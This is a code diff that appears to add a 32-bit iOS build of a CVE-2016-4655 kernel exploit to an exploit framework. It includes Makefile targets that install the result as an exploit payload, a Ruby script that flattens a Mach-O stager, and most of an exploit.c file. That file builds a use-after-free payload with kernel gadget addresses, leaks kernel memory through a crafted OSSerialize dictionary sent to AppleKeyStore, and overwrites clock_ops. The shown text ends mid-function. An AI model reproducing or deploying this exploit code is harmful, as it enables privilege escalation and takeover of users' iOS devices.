 		-I/Users/User/rsync/mettle/build/aarch64-iphone-darwin/include \
 		-I/Users/User/rsync/mettle/mettle/src \
@@ -13,7 +14,10 @@ GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \
 		-lmettle -lsigar -lev -lz -leio -ldnet -lcurl -lmbedx509 -lmbedtls -lmbedcrypto \
 		-framework CoreVideo -framework CoreImage -framework CoreGraphics -framework CoreMedia -framework AVFoundation -framework UIKit

-all: clean main_ios
+GCC_IOS_32=$(GCC_BASE_IOS) $(CFLAGS_32) -arch armv7 -isysroot $(SDK_IOS) \
+		-Iheaders
+
+all: clean main_ios main_ios32

 flatten: flatten-macho.m
 	$(GCC_OSX) -o $@ $^
@@ -21,12 +25,21 @@ flatten: flatten-macho.m
 main_ios: main.m exploit64.m find.m main.m nvpatch.m set.m
 	$(GCC_IOS) -o $@ $^

+main_ios32: main32.c
+	$(GCC_IOS_32) -o $@ $^
+
+main_ios32.bin: main_ios32
+	ruby create_bin.rb main_ios32
+
 main_vm: flatten main_ios
 	./flatten main_ios main_vm

 install: main_vm
 	cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit

-clean:
-	rm -f *.o main_ios main_vm flatten
+install32: main_ios32.bin
+	cp main_ios32.bin ../../../../data/exploits/CVE-2016-4655/exploit32
+
+clean:
+	rm -f *.o main_ios main_ios32 main_ios32.bin main_vm flatten

@@ -0,0 +1,52 @@
+#!/usr/bin/env ruby
+# -*- coding: binary -*-
+
+require 'macho'
+
+stager_file = ARGV[0]
+data = File.binread(stager_file)
+macho = MachO::MachOFile.new_from_bin(data)
+main_func = macho[:LC_MAIN].first
+entry_offset = main_func.entryoff
+
+start = -1
+min = -1
+max = 0
+for segment in macho.segments
+  next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
+  puts "segment: #{segment.segname} #{segment.vmaddr.to_s(16)}"
+  if min == -1 or min > segment.vmaddr
+    min = segment.vmaddr
+  end
+  if max < segment.vmaddr + segment.vmsize
+    max = segment.vmaddr + segment.vmsize
+  end
+end
+
+puts "data: #{min.to_s(16)} -> #{max.to_s(16)} #{(max - min).to_s(16)}"
+output_data = "\x00" * (max - min)
+
+for segment in macho.segments
+  #next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
+  puts "segment: #{segment.segname} off: #{segment.offset.to_s(16)} vmaddr: #{segment.vmaddr.to_s(16)} fileoff: #{segment.fileoff.to_s(16)}"
+  for section in segment.sections
+    puts "section: #{section.sectname} off: #{section.offset.to_s(16)} addr: #{section.addr.to_s(16)} size: #{section.size.to_s(16)}"
+    flat_addr = section.addr - min
+    section_data = data[section.offset, section.size]
+    #file_section = section.offset
+    #puts "info: #{segment.fileoff.to_s(16)} #{segment.offset.to_s(16)} #{section.size.to_s(16)} #{file_section.to_s(16)}"
+    #puts "?: #{data.size.to_s(16)} #{file_section.to_s(16)}"
+    if section_data
+      puts "flat_addr: #{flat_addr.to_s(16)} (#{section_data.size.to_s(16)})"
+      if start == -1 or start > flat_addr
+        start = flat_addr
+      end
+      output_data[flat_addr, section_data.size] = section_data
+    end
+  end
+end
+
+puts "start: #{start.to_s(16)}"
+output_data = output_data[start..-1]
+File.binwrite(stager_file + ".bin", output_data)
+
@@ -0,0 +1,1372 @@
+//
+//  exploit.c
+//  Trident
+//
+//  Created by Benjamin Randazzo on 06/11/2016.
+//  Copyright © 2016 Benjamin Randazzo. All rights reserved.
+//
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <assert.h>
+
+#include <pthread.h>
+
+#include <sys/syscall.h>
+#include <sys/kauth.h>
+#include <sys/stat.h>
+
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+#include <sys/utsname.h>
+
+#include <mach/mach.h>
+
+#include <IOKit/IOKitLib.h>
+
+#include <dlfcn.h>
+#include <asl.h>
+
+#include <spawn.h>
+
+enum
+{
+    kOSSerializeDictionary   = 0x01000000U,
+    kOSSerializeArray        = 0x02000000U,
+    kOSSerializeSet          = 0x03000000U,
+    kOSSerializeNumber       = 0x04000000U,
+    kOSSerializeSymbol       = 0x08000000U,
+    kOSSerializeString       = 0x09000000U,
+    kOSSerializeData         = 0x0a000000U,
+    kOSSerializeBoolean      = 0x0b000000U,
+    kOSSerializeObject       = 0x0c000000U,
+    kOSSerializeTypeMask     = 0x7F000000U,
+    kOSSerializeDataMask     = 0x00FFFFFFU,
+    kOSSerializeEndCollecton = 0x80000000U,
+};
+
+#define kOSSerializeBinarySignature "\323\0\0"
+
+#define WRITE_IN(buf, data) do { *(uint32_t *)(buf+bufpos) = (data); bufpos+=4; } while(0)
+
+typedef void* (*dlopen_ptr)(const char *filename, int flags);
+typedef void* (*dlsym_ptr)(void *handle, const char *symbol);
+static dlopen_ptr dlopen_func = 0;
+static dlsym_ptr dlsym_func = 0;
+
+#ifdef DEBUG
+#define debug_print(fmt, ...) \
+            do { asl_log_func(0, 0, ASL_LEVEL_ERR, fmt, __VA_ARGS__); } while (0)
+#else
+#define debug_print(fmt, ...)
+#endif
+
+#define DLSYM_FUNC(func, library, return_type, args...) \
+  typedef return_type (*func##_ptr)(args); \
+  func##_ptr func##_func = dlsym_func(library, #func); \
+  debug_print("function %s = %p!\n", #func, func##_func);
+
+#define TTB_SIZE            4096
+
+#define L1_SECT_S_BIT       (1 << 16)
+#define L1_SECT_PROTO       (1 << 1)        /* 0b10 */
+#define L1_SECT_AP_URW      (1 << 10) | (1 << 11)
+#define L1_SECT_APX         (1 << 15)
+#define L1_SECT_DEFPROT     (L1_SECT_AP_URW | L1_SECT_APX)
+#define L1_SECT_SORDER      (0)            /* 0b00, not cacheable, strongly ordered. */
+#define L1_SECT_DEFCACHE    (L1_SECT_SORDER)
+#define L1_PROTO_TTE(entry) (entry | L1_SECT_S_BIT | L1_SECT_DEFPROT | L1_SECT_DEFCACHE)
+
+#define L1_PAGE_PROTO       (1 << 0)
+#define L1_COARSE_PT        (0xFFFFFC00)
+
+#define PT_SIZE             256
+
+#define L2_PAGE_APX         (1 << 9)
+
+static char *lockfile;
+static int fd;
+
+static int fildes[2];
+static uint32_t cpipe;
+static uint32_t pipebuf;
+
+static clock_serv_t clk_battery;
+static clock_serv_t clk_realtime;
+
+struct mac_policy_ops{
+    uint32_t mpo_audit_check_postselect;
+    uint32_t mpo_audit_check_preselect;
+    uint32_t mpo_bpfdesc_label_associate;
+    uint32_t mpo_bpfdesc_label_destroy;
+    uint32_t mpo_bpfdesc_label_init;
+    uint32_t mpo_bpfdesc_check_receive;
+    uint32_t mpo_cred_check_label_update_execve;
+    uint32_t mpo_cred_check_label_update;
+    uint32_t mpo_cred_check_visible;
+    uint32_t mpo_cred_label_associate_fork;
+    uint32_t mpo_cred_label_associate_kernel;
+    uint32_t mpo_cred_label_associate;
+    uint32_t mpo_cred_label_associate_user;
+    uint32_t mpo_cred_label_destroy;
+    uint32_t mpo_cred_label_externalize_audit;
+    uint32_t mpo_cred_label_externalize;
+    uint32_t mpo_cred_label_init;
+    uint32_t mpo_cred_label_internalize;
+    uint32_t mpo_cred_label_update_execve;
+    uint32_t mpo_cred_label_update;
+    uint32_t mpo_devfs_label_associate_device;
+    uint32_t mpo_devfs_label_associate_directory;
+    uint32_t mpo_devfs_label_copy;
+    uint32_t mpo_devfs_label_destroy;
+    uint32_t mpo_devfs_label_init;
+    uint32_t mpo_devfs_label_update;
+    uint32_t mpo_file_check_change_offset;
+    uint32_t mpo_file_check_create;
+    uint32_t mpo_file_check_dup;
+    uint32_t mpo_file_check_fcntl;
+    uint32_t mpo_file_check_get_offset;
+    uint32_t mpo_file_check_get;
+    uint32_t mpo_file_check_inherit;
+    uint32_t mpo_file_check_ioctl;
+    uint32_t mpo_file_check_lock;
+    uint32_t mpo_file_check_mmap_downgrade;
+    uint32_t mpo_file_check_mmap;
+    uint32_t mpo_file_check_receive;
+    uint32_t mpo_file_check_set;
+    uint32_t mpo_file_label_init;
+    uint32_t mpo_file_label_destroy;
+    uint32_t mpo_file_label_associate;
+    uint32_t mpo_ifnet_check_label_update;
+    uint32_t mpo_ifnet_check_transmit;
+    uint32_t mpo_ifnet_label_associate;
+    uint32_t mpo_ifnet_label_copy;
+    uint32_t mpo_ifnet_label_destroy;
+    uint32_t mpo_ifnet_label_externalize;
+    uint32_t mpo_ifnet_label_init;
+    uint32_t mpo_ifnet_label_internalize;
+    uint32_t mpo_ifnet_label_update;
+    uint32_t mpo_ifnet_label_recycle;
+    uint32_t mpo_inpcb_check_deliver;
+    uint32_t mpo_inpcb_label_associate;
+    uint32_t mpo_inpcb_label_destroy;
+    uint32_t mpo_inpcb_label_init;
+    uint32_t mpo_inpcb_label_recycle;
+    uint32_t mpo_inpcb_label_update;
+    uint32_t mpo_iokit_check_device;
+    uint32_t mpo_ipq_label_associate;
+    uint32_t mpo_ipq_label_compare;
+    uint32_t mpo_ipq_label_destroy;
+    uint32_t mpo_ipq_label_init;
+    uint32_t mpo_ipq_label_update;
+    uint32_t mpo_file_check_library_validation;
+    uint32_t mpo_vnode_notify_setacl;
+    uint32_t mpo_vnode_notify_setattrlist;
+    uint32_t mpo_vnode_notify_setextattr;
+    uint32_t mpo_vnode_notify_setflags;
+    uint32_t mpo_vnode_notify_setmode;
+    uint32_t mpo_vnode_notify_setowner;
+    uint32_t mpo_vnode_notify_setutimes;
+    uint32_t mpo_vnode_notify_truncate;
+    uint32_t mpo_mbuf_label_associate_bpfdesc;
+    uint32_t mpo_mbuf_label_associate_ifnet;
+    uint32_t mpo_mbuf_label_associate_inpcb;
+    uint32_t mpo_mbuf_label_associate_ipq;
+    uint32_t mpo_mbuf_label_associate_linklayer;
+    uint32_t mpo_mbuf_label_associate_multicast_encap;
+    uint32_t mpo_mbuf_label_associate_netlayer;
+    uint32_t mpo_mbuf_label_associate_socket;
+    uint32_t mpo_mbuf_label_copy;
+    uint32_t mpo_mbuf_label_destroy;
+    uint32_t mpo_mbuf_label_init;
+    uint32_t mpo_mount_check_fsctl;
+    uint32_t mpo_mount_check_getattr;
+    uint32_t mpo_mount_check_label_update;
+    uint32_t mpo_mount_check_mount;
+    uint32_t mpo_mount_check_remount;
+    uint32_t mpo_mount_check_setattr;
+    uint32_t mpo_mount_check_stat;
+    uint32_t mpo_mount_check_umount;
+    uint32_t mpo_mount_label_associate;
+    uint32_t mpo_mount_label_destroy;
+    uint32_t mpo_mount_label_externalize;
+    uint32_t mpo_mount_label_init;
+    uint32_t mpo_mount_label_internalize;
+    uint32_t mpo_netinet_fragment;
+    uint32_t mpo_netinet_icmp_reply;
+    uint32_t mpo_netinet_tcp_reply;
+    uint32_t mpo_pipe_check_ioctl;
+    uint32_t mpo_pipe_check_kqfilter;
+    uint32_t mpo_pipe_check_label_update;
+    uint32_t mpo_pipe_check_read;
+    uint32_t mpo_pipe_check_select;
+    uint32_t mpo_pipe_check_stat;
+    uint32_t mpo_pipe_check_write;
+    uint32_t mpo_pipe_label_associate;
+    uint32_t mpo_pipe_label_copy;
+    uint32_t mpo_pipe_label_destroy;
+    uint32_t mpo_pipe_label_externalize;
+    uint32_t mpo_pipe_label_init;
+    uint32_t mpo_pipe_label_internalize;
+    uint32_t mpo_pipe_label_update;
+    uint32_t mpo_policy_destroy;
+    uint32_t mpo_policy_init;
+    uint32_t mpo_policy_initbsd;
+    uint32_t mpo_policy_syscall;
+    uint32_t mpo_system_check_sysctlbyname;
+    uint32_t mpo_proc_check_inherit_ipc_ports;
+    uint32_t mpo_vnode_check_rename;
+    uint32_t mpo_kext_check_query;
+    uint32_t mpo_iokit_check_nvram_get;
+    uint32_t mpo_iokit_check_nvram_set;
+    uint32_t mpo_iokit_check_nvram_delete;
+    uint32_t mpo_proc_check_expose_task;
+    uint32_t mpo_proc_check_set_host_special_port;
+    uint32_t mpo_proc_check_set_host_exception_port;
+    uint32_t mpo_exc_action_check_exception_send;
+    uint32_t mpo_exc_action_label_associate;
+    uint32_t mpo_exc_action_label_populate;
+    uint32_t mpo_exc_action_label_destroy;
+    uint32_t mpo_exc_action_label_init;
+    uint32_t mpo_exc_action_label_update;
+    uint32_t mpo_reserved1;
+    uint32_t mpo_reserved2;
+    uint32_t mpo_reserved3;
+    uint32_t mpo_reserved4;
+    uint32_t mpo_skywalk_flow_check_connect;
+    uint32_t mpo_skywalk_flow_check_listen;
+    uint32_t mpo_posixsem_check_create;
+    uint32_t mpo_posixsem_check_open;
+    uint32_t mpo_posixsem_check_post;
+    uint32_t mpo_posixsem_check_unlink;
+    uint32_t mpo_posixsem_check_wait;
+    uint32_t mpo_posixsem_label_associate;
+    uint32_t mpo_posixsem_label_destroy;
+    uint32_t mpo_posixsem_label_init;
+    uint32_t mpo_posixshm_check_create;
+    uint32_t mpo_posixshm_check_mmap;
+    uint32_t mpo_posixshm_check_open;
+    uint32_t mpo_posixshm_check_stat;
+    uint32_t mpo_posixshm_check_truncate;
+    uint32_t mpo_posixshm_check_unlink;
+    uint32_t mpo_posixshm_label_associate;
+    uint32_t mpo_posixshm_label_destroy;
+    uint32_t mpo_posixshm_label_init;
+    uint32_t mpo_proc_check_debug;
+    uint32_t mpo_proc_check_fork;
+    uint32_t mpo_proc_check_get_task_name;
+    uint32_t mpo_proc_check_get_task;
+    uint32_t mpo_proc_check_getaudit;
+    uint32_t mpo_proc_check_getauid;
+    uint32_t mpo_proc_check_getlcid;
+    uint32_t mpo_proc_check_mprotect;
+    uint32_t mpo_proc_check_sched;
+    uint32_t mpo_proc_check_setaudit;
+    uint32_t mpo_proc_check_setauid;
+    uint32_t mpo_proc_check_setlcid;
+    uint32_t mpo_proc_check_signal;
+    uint32_t mpo_proc_check_wait;
+    uint32_t mpo_proc_label_destroy;
+    uint32_t mpo_proc_label_init;
+    uint32_t mpo_socket_check_accept;
+    uint32_t mpo_socket_check_accepted;
+    uint32_t mpo_socket_check_bind;
+    uint32_t mpo_socket_check_connect;
+    uint32_t mpo_socket_check_create;
+    uint32_t mpo_socket_check_deliver;
+    uint32_t mpo_socket_check_kqfilter;
+    uint32_t mpo_socket_check_label_update;
+    uint32_t mpo_socket_check_listen;
+    uint32_t mpo_socket_check_receive;
+    uint32_t mpo_socket_check_received;
+    uint32_t mpo_socket_check_select;
+    uint32_t mpo_socket_check_send;
+    uint32_t mpo_socket_check_stat;
+    uint32_t mpo_socket_check_setsockopt;
+    uint32_t mpo_socket_check_getsockopt;
+    uint32_t mpo_socket_label_associate_accept;
+    uint32_t mpo_socket_label_associate;
+    uint32_t mpo_socket_label_copy;
+    uint32_t mpo_socket_label_destroy;
+    uint32_t mpo_socket_label_externalize;
+    uint32_t mpo_socket_label_init;
+    uint32_t mpo_socket_label_internalize;
+    uint32_t mpo_socket_label_update;
+    uint32_t mpo_socketpeer_label_associate_mbuf;
+    uint32_t mpo_socketpeer_label_associate_socket;
+    uint32_t mpo_socketpeer_label_destroy;
+    uint32_t mpo_socketpeer_label_externalize;
+    uint32_t mpo_socketpeer_label_init;
+    uint32_t mpo_system_check_acct;
+    uint32_t mpo_system_check_audit;
+    uint32_t mpo_system_check_auditctl;
+    uint32_t mpo_system_check_auditon;
+    uint32_t mpo_system_check_host_priv;
+    uint32_t mpo_system_check_nfsd;
+    uint32_t mpo_system_check_reboot;
+    uint32_t mpo_system_check_settime;
+    uint32_t mpo_system_check_swapoff;
+    uint32_t mpo_system_check_swapon;
+    uint32_t mpo_socket_check_ioctl;
+    uint32_t mpo_sysvmsg_label_associate;
+    uint32_t mpo_sysvmsg_label_destroy;
+    uint32_t mpo_sysvmsg_label_init;
+    uint32_t mpo_sysvmsg_label_recycle;
+    uint32_t mpo_sysvmsq_check_enqueue;
+    uint32_t mpo_sysvmsq_check_msgrcv;
+    uint32_t mpo_sysvmsq_check_msgrmid;
+    uint32_t mpo_sysvmsq_check_msqctl;
+    uint32_t mpo_sysvmsq_check_msqget;
+    uint32_t mpo_sysvmsq_check_msqrcv;
+    uint32_t mpo_sysvmsq_check_msqsnd;
+    uint32_t mpo_sysvmsq_label_associate;
+    uint32_t mpo_sysvmsq_label_destroy;
+    uint32_t mpo_sysvmsq_label_init;
+    uint32_t mpo_sysvmsq_label_recycle;
+    uint32_t mpo_sysvsem_check_semctl;
+    uint32_t mpo_sysvsem_check_semget;
+    uint32_t mpo_sysvsem_check_semop;
+    uint32_t mpo_sysvsem_label_associate;
+    uint32_t mpo_sysvsem_label_destroy;
+    uint32_t mpo_sysvsem_label_init;
+    uint32_t mpo_sysvsem_label_recycle;
+    uint32_t mpo_sysvshm_check_shmat;
+    uint32_t mpo_sysvshm_check_shmctl;
+    uint32_t mpo_sysvshm_check_shmdt;
+    uint32_t mpo_sysvshm_check_shmget;
+    uint32_t mpo_sysvshm_label_associate;
+    uint32_t mpo_sysvshm_label_destroy;
+    uint32_t mpo_sysvshm_label_init;
+    uint32_t mpo_sysvshm_label_recycle;
+    uint32_t mpo_proc_notify_exit;
+    uint32_t mpo_mount_check_snapshot_revert;
+    uint32_t mpo_vnode_check_getattr;
+    uint32_t mpo_mount_check_snapshot_create;
+    uint32_t mpo_mount_check_snapshot_delete;
+    uint32_t mpo_vnode_check_clone;
+    uint32_t mpo_proc_check_get_cs_info;
+    uint32_t mpo_proc_check_set_cs_info;
+    uint32_t mpo_iokit_check_hid_control;
+    uint32_t mpo_vnode_check_access;
+    uint32_t mpo_vnode_check_chdir;
+    uint32_t mpo_vnode_check_chroot;
+    uint32_t mpo_vnode_check_create;
+    uint32_t mpo_vnode_check_deleteextattr;
+    uint32_t mpo_vnode_check_exchangedata;
+    uint32_t mpo_vnode_check_exec;
+    uint32_t mpo_vnode_check_getattrlist;
+    uint32_t mpo_vnode_check_getextattr;
+    uint32_t mpo_vnode_check_ioctl;
+    uint32_t mpo_vnode_check_kqfilter;
+    uint32_t mpo_vnode_check_label_update;
+    uint32_t mpo_vnode_check_link;
+    uint32_t mpo_vnode_check_listextattr;
+    uint32_t mpo_vnode_check_lookup;
+    uint32_t mpo_vnode_check_open;
+    uint32_t mpo_vnode_check_read;
+    uint32_t mpo_vnode_check_readdir;
+    uint32_t mpo_vnode_check_readlink;
+    uint32_t mpo_vnode_check_rename_from;
+    uint32_t mpo_vnode_check_rename_to;
+    uint32_t mpo_vnode_check_revoke;
+    uint32_t mpo_vnode_check_select;
+    uint32_t mpo_vnode_check_setattrlist;
+    uint32_t mpo_vnode_check_setextattr;
+    uint32_t mpo_vnode_check_setflags;
+    uint32_t mpo_vnode_check_setmode;
+    uint32_t mpo_vnode_check_setowner;
+    uint32_t mpo_vnode_check_setutimes;
+    uint32_t mpo_vnode_check_stat;
+    uint32_t mpo_vnode_check_truncate;
+    uint32_t mpo_vnode_check_unlink;
+    uint32_t mpo_vnode_check_write;
+    uint32_t mpo_vnode_label_associate_devfs;
+    uint32_t mpo_vnode_label_associate_extattr;
+    uint32_t mpo_vnode_label_associate_file;
+    uint32_t mpo_vnode_label_associate_pipe;
+    uint32_t mpo_vnode_label_associate_posixsem;
+    uint32_t mpo_vnode_label_associate_posixshm;
+    uint32_t mpo_vnode_label_associate_singlelabel;
+    uint32_t mpo_vnode_label_associate_socket;
+    uint32_t mpo_vnode_label_copy;
+    uint32_t mpo_vnode_label_destroy;
+    uint32_t mpo_vnode_label_externalize_audit;
+    uint32_t mpo_vnode_label_externalize;
+    uint32_t mpo_vnode_label_init;
+    uint32_t mpo_vnode_label_internalize;
+    uint32_t mpo_vnode_label_recycle;
+    uint32_t mpo_vnode_label_store;
+    uint32_t mpo_vnode_label_update_extattr;
+    uint32_t mpo_vnode_label_update;
+    uint32_t mpo_vnode_notify_create;
+    uint32_t mpo_vnode_check_signature;
+    uint32_t mpo_vnode_check_uipc_bind;
+    uint32_t mpo_vnode_check_uipc_connect;
+    uint32_t mpo_proc_check_run_cs_invalid;
+    uint32_t mpo_proc_check_suspend_resume;
+    uint32_t mpo_thread_userret;
+    uint32_t mpo_iokit_check_set_properties;
+    uint32_t mpo_system_check_chud;
+    uint32_t mpo_vnode_check_searchfs;
+    uint32_t mpo_priv_check;
+    uint32_t mpo_priv_grant;
+    uint32_t mpo_proc_check_map_anon;
+    uint32_t mpo_vnode_check_fsgetpath;
+    uint32_t mpo_iokit_check_open;
+    uint32_t mpo_proc_check_ledger;
+    uint32_t mpo_vnode_notify_rename;
+    uint32_t mpo_vnode_check_setacl;
+    uint32_t mpo_vnode_notify_deleteextattr;
+    uint32_t mpo_system_check_kas_info;
+    uint32_t mpo_vnode_check_lookup_preflight;
+    uint32_t mpo_vnode_notify_open;
+    uint32_t mpo_system_check_info;
+    uint32_t mpo_pty_notify_grant;
+    uint32_t mpo_pty_notify_close;
+    uint32_t mpo_vnode_find_sigs;
+    uint32_t mpo_kext_check_load;
+    uint32_t mpo_kext_check_unload;
+    uint32_t mpo_proc_check_proc_info;
+    uint32_t mpo_vnode_notify_link;
+    uint32_t mpo_iokit_check_filter_properties;
+    uint32_t mpo_iokit_check_get_property;
+};
+
+#include "offsets32.c"
+
+static unsigned char clock_ops_overwrite[] = {
+    0x00, 0x00, 0x00, 0x00, // [00] (rtclock.getattr): address of OSSerializer::serialize (+1)
+    0x00, 0x00, 0x00, 0x00, // [04] (calend_config): NULL
+    0x00, 0x00, 0x00, 0x00, // [08] (calend_init): NULL
+    0x00, 0x00, 0x00, 0x00, // [0C] (calend_gettime): address of calend_gettime (+1)
+    0x00, 0x00, 0x00, 0x00, // [10] (calend_getattr): address of _bufattr_cpx (+1)
+};
+
+static unsigned char uaf_payload_buffer[] = {
+    0x00, 0x00, 0x00, 0x00, // [00] ptr to clock_ops_overwrite buffer
+    0x00, 0x00, 0x00, 0x00, // [04] address of clock_ops array in kern memory
+    0x00, 0x00, 0x00, 0x00, // [08] address of _copyin
+    0x00, 0x00, 0x00, 0x00, // [0C] NULL
+    0x00, 0x00, 0x00, 0x00, // [10] address of OSSerializer::serialize (+1)
+    0x00, 0x00, 0x00, 0x00, // [14] address of "BX LR" code fragment
+    0x00, 0x00, 0x00, 0x00, // [18] NULL
+    0x00, 0x00, 0x00, 0x00, // [1C] address of OSSymbol::getMetaClass (+1)
+    0x00, 0x00, 0x00, 0x00, // [20] address of "BX LR" code fragment
+    0x00, 0x00, 0x00, 0x00, // [24] address of "BX LR" code fragment
+};
+
+static unsigned char pExploit[128];
+
+#define PAYLOAD_TO_PEXPLOIT (-76)
+#define PEXPLOIT_TO_UAF_PAYLOAD 8
+
+static vm_offset_t vm_kernel_addrperm;
+
+static uint32_t write_gadget; // address of "str r1, [r0, #0xc] ; bx lr"
+
+typedef kern_return_t (*clock_get_attributes_ptr)(clock_t clock_name, clock_flavor_t flavor, clock_attr_t attribute, mach_msg_type_number_t attribute_count);
+static clock_get_attributes_ptr clock_get_attributes_func;
+
+typedef ssize_t (*read_ptr)(int fd, void *buf, size_t count);
+static read_ptr read_func;
+
+typedef ssize_t (*write_ptr)(int fd, const void *buf, size_t count);
+static write_ptr write_func;
+
+void *insert_payload(void *ptr) 
+{
+  void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
+
+#ifdef DEBUG
+  typedef int (*asl_log_ptr)(aslclient asl, aslmsg msg, int level, const char *format, ...);
+  asl_log_ptr asl_log_func = dlsym_func(libsystem, "asl_log");
+#endif
+
+  typedef void* (*memcpy_ptr)( void * destination, const void * source, size_t num);
+  memcpy_ptr memcpy_func = dlsym_func(libsystem, "memcpy");
+
+  void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
+
+  typedef CFMutableDictionaryRef (*IOServiceMatching_ptr)(const char *name);
+  IOServiceMatching_ptr IOServiceMatching_func = dlsym_func(libIOKit, "IOServiceMatching");
+
+  typedef io_service_t (*IOServiceGetMatchingService_ptr)(mach_port_t masterPort, CFDictionaryRef matching);
+  IOServiceGetMatchingService_ptr IOServiceGetMatchingService_func = dlsym_func(libIOKit, "IOServiceGetMatchingService");
+
+  typedef mach_port_t (*mach_task_self_ptr)();
+  mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
+
+  typedef kern_return_t (*io_service_open_extended_ptr)(mach_port_t service, task_t owningTask, uint32_t connect_type, NDR_record_t ndr, io_buf_ptr_t properties, mach_msg_type_number_t propertiesCnt, kern_return_t *result, mach_port_t *connection);
+  io_service_open_extended_ptr io_service_open_extended_func = dlsym_func(libIOKit, "io_service_open_extended");
+
+  typedef kern_return_t (*IORegistryEntryGetChildIterator_ptr)(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *iterator);
+  IORegistryEntryGetChildIterator_ptr IORegistryEntryGetChildIterator_func = dlsym_func(libIOKit, "IORegistryEntryGetChildIterator");
+
+  typedef kern_return_t (*IOObjectRelease_ptr)(io_object_t object);
+  IOObjectRelease_ptr IOObjectRelease_func = dlsym_func(libIOKit, "IOObjectRelease");
+
+  typedef io_object_t (*IOIteratorNext_ptr)(io_iterator_t iterator);
+  IOIteratorNext_ptr IOIteratorNext_func = dlsym_func(libIOKit, "IOIteratorNext");
+
+  typedef kern_return_t (*IORegistryEntryGetProperty_ptr)(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t *size);
+  IORegistryEntryGetProperty_ptr IORegistryEntryGetProperty_func = dlsym_func(libIOKit, "IORegistryEntryGetProperty");
+
+  char stackAnchor;
+  uint32_t bufpos; // unsigned int size;
+  char buffer[4096];
+  int v26;
+  mach_port_t connection;
+  kern_return_t result;
+
+  char *p = (char *)((unsigned int)&stackAnchor & 0xFFFFF000);
+  // kauth_filesec.fsec_magic
+  *(uint32_t *)(p + 0xEC0) = 0x12CC16D;
+  // kauth_filesec.fsec_acl.entrycount = KAUTH_FILESEC_NOACL
+  *(uint32_t *)(p + 0xEE4) = -1;
+  // kauth_filesec.fsec_acl.acl_ace[...]
+  memcpy_func((void *)(((unsigned int)&stackAnchor & 0xFFFFF000) | 0xEEC), pExploit, 128);
+
+  memcpy_func(buffer, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
+  bufpos = sizeof(kOSSerializeBinarySignature);
+
+  WRITE_IN(buffer, kOSSerializeDictionary | kOSSerializeEndCollecton | 2);
+
+  WRITE_IN(buffer, kOSSerializeSymbol | 128);
+  // "ararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararara"
+  for (v26=0; v26<124; v26+=4) {
+    WRITE_IN(buffer, 0x72617261);
+  }
+  WRITE_IN(buffer, 0x00617261);
+  WRITE_IN(buffer, kOSSerializeNumber | 2048);
+  WRITE_IN(buffer, 0x00000004);
+  WRITE_IN(buffer, 0X00000000);
+
+  WRITE_IN(buffer, kOSSerializeSymbol | 30);
+  WRITE_IN(buffer, 0x4b444948); // "HIDKeyboardModifierMappingDst"
+  WRITE_IN(buffer, 0x6f627965);
+  WRITE_IN(buffer, 0x4d647261);
+  WRITE_IN(buffer, 0x6669646f);
+  WRITE_IN(buffer, 0x4d726569);
+  WRITE_IN(buffer, 0x69707061);
+  WRITE_IN(buffer, 0x7344676e);
+  WRITE_IN(buffer, 0x00000074);
+  WRITE_IN(buffer, kOSSerializeNumber | kOSSerializeEndCollecton | 32);
+  WRITE_IN(buffer, 0x00000193);
+  WRITE_IN(buffer, 0x00000000);
+
+  io_service_t service = IOServiceGetMatchingService_func(0, IOServiceMatching_func("AppleKeyStore"));
+
+  NDR_record_t* NDR_record_lookup = dlsym_func(libIOKit, "NDR_record");
+  io_service_open_extended_func(service, mach_task_self_func(), 0, *NDR_record_lookup, buffer, bufpos, &result, &connection);
+  if (result != KERN_SUCCESS) {
+    debug_print("%s\n", "io_service_open_extended fail");
+    return NULL;
+  }
+
+  io_object_t object = 0;
+  uint32_t size = sizeof(buffer);
+  io_iterator_t iterator;
+  IORegistryEntryGetChildIterator_func(service, "IOService", &iterator);
+  uint32_t *args = (uint32_t *)ptr;
+  uint32_t kernel_base = *args;
+  uint32_t payload_ptr = 0;
+
+  do {
+    if (object) {
+      IOObjectRelease_func(object);
+    }
+    object = IOIteratorNext_func(iterator);
+  } while (IORegistryEntryGetProperty_func(object, "ararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararararara", buffer, &size));
+
+  if (size > 8) {
+    payload_ptr = *(uint32_t *)(buffer+16);
+  }
+
+  *(uint32_t *)clock_ops_overwrite = kernel_base + find_OSSerializer_serialize() + 1;
+  *(uint32_t *)(clock_ops_overwrite+0xC) = kernel_base + find_calend_gettime() + 1;
+  *(uint32_t *)(clock_ops_overwrite+0x10) = kernel_base + find_bufattr_cpx() + 1;
+
+  *(uint32_t *)uaf_payload_buffer = (uint32_t)clock_ops_overwrite;
+  *(uint32_t *)(uaf_payload_buffer+0x4) = kernel_base + find_clock_ops();
+  *(uint32_t *)(uaf_payload_buffer+0x8) = kernel_base + find_copyin();
+  *(uint32_t *)(uaf_payload_buffer+0x10) = kernel_base + find_OSSerializer_serialize() + 1;
+  *(uint32_t *)(uaf_payload_buffer+0x14) = kernel_base + find_bx_lr();
+  *(uint32_t *)(uaf_payload_buffer+0x1C) = kernel_base + find_OSSymbol_getMetaClass() + 1;
+  *(uint32_t *)(uaf_payload_buffer+0x20) = kernel_base + find_bx_lr();
+  *(uint32_t *)(uaf_payload_buffer+0x24) = kernel_base + find_bx_lr();
+
+  memcpy_func(pExploit+PEXPLOIT_TO_UAF_PAYLOAD, uaf_payload_buffer, sizeof(uaf_payload_buffer));
+  memcpy_func(pExploit+PEXPLOIT_TO_UAF_PAYLOAD+sizeof(uaf_payload_buffer), clock_ops_overwrite, sizeof(clock_ops_overwrite));
+
+  // kauth_filesec.fsec_acl.acl_ace[...]
